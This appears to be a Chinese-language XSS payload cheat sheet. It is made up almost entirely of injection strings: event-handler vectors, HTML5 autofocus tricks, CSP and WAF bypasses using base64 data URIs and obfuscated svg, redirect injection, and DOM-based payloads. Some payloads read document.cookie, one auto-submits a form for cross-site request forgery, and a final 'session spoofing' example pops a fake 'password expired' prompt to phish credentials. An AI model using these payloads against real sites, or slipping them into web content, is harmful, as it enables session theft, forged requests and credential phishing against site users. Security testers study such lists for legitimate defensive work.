XSS測試代碼

 無script的Xss

<img/src=# onerror=alert('XSS')>

 

HTML5  XSS測試代碼

<video> <source onerror=」javascript:alert(1)」>

引入媒體類測試代碼Example:
<video onerror=」javascript:alert(1)」><source>
<audio onerror=」javascript:alert(1)」><source>

<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>

表單點擊測試代碼Example:
<button form=test onformchange=alert(2)>X
<form><button formaction=」javascript:alert(1)」>

 

ByPass

text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

<base href="javascript:\"> <a href="//%0aalert(/1/);//">link</a>

javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

 

 

 CSP & WAF Bypassjavascript

<meta/content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg=="http-equiv=refresh>

<svg </onload ="1> (_=alert,_(1337)) "">

<img onerror=alert(1) src <u></u>

 

 

重定向 攻擊代碼:php

';redirecturl='javascript:alert("XSS")
';redirecturl='http://google.com/'

 

Example: www.xyz.com?q="XSS Script"html

   

 "/>alert("Xss:Priyanshu")
    "/></script><script>alert(/XSS : Priyanshu/)</script>

<body onload=alert(1)>
"<body onload="alert('XSS by Priyanshu')">

"><%2Fstyle<%2Fscript><script>confirm("XSS By Priyanshu")<%2Fscript>

<body onload=document.getElementById("xsrf").submit()>

<a href="data:text/html;based64_,<svg/onload=\u0061&#x6c;&101%72t(1)>">X</a

<a href="data:text/html;based64_,<svg/onload=\u0061&#x6c;&101%72t(document.cookie)>">X</a

    http://test.com<script>alert(document.domain)</script>
    http://test.com<script>alert(document.cookie)</script>

<img src=x onerror=alert(document.domain)>

x"></script><img src=x onerror=alert(1)>

q=" onclick="alert(/XSS/)

"><iframe src='javascript:prompt(/XSS/);'>

<iframe src="http://google.com"></iframe>

"><iframe src=a onload=alert('XSS')<

</script><script>alert(document.cookie)</script>

<xss>alert('xss')</xss>

<iframe src="http://google.com"></iframe>

DOM Based XSS Scripts

    /default.aspx#"><img src=x onerror=prompt('XSS');>
    /default.aspx#"><img src=x onerror=prompt('0');>

<img src=x onerror=prompt(1);> by ">
><img src=x onerror=prompt(0)>.txt.jpg

「><img src=x onerror=alert(document.cookie)>

"><img src=x onerror=prompt(1);>

"><script>alert('XSS')</script>

id=abc"><Script>alert(/xss/)</SCRIPT>

"><img src=" " onMouseover=prompt(/xss/);>

Default.aspx/" onmouseout="confirm(1)'x="

 

 

欺騙會話

http://localhost/test.php?title=TITLE</title><script>var a = prompt('密碼已通過期,請從新輸入密碼');alert(a);</script>java

相關文章
相關標籤/搜索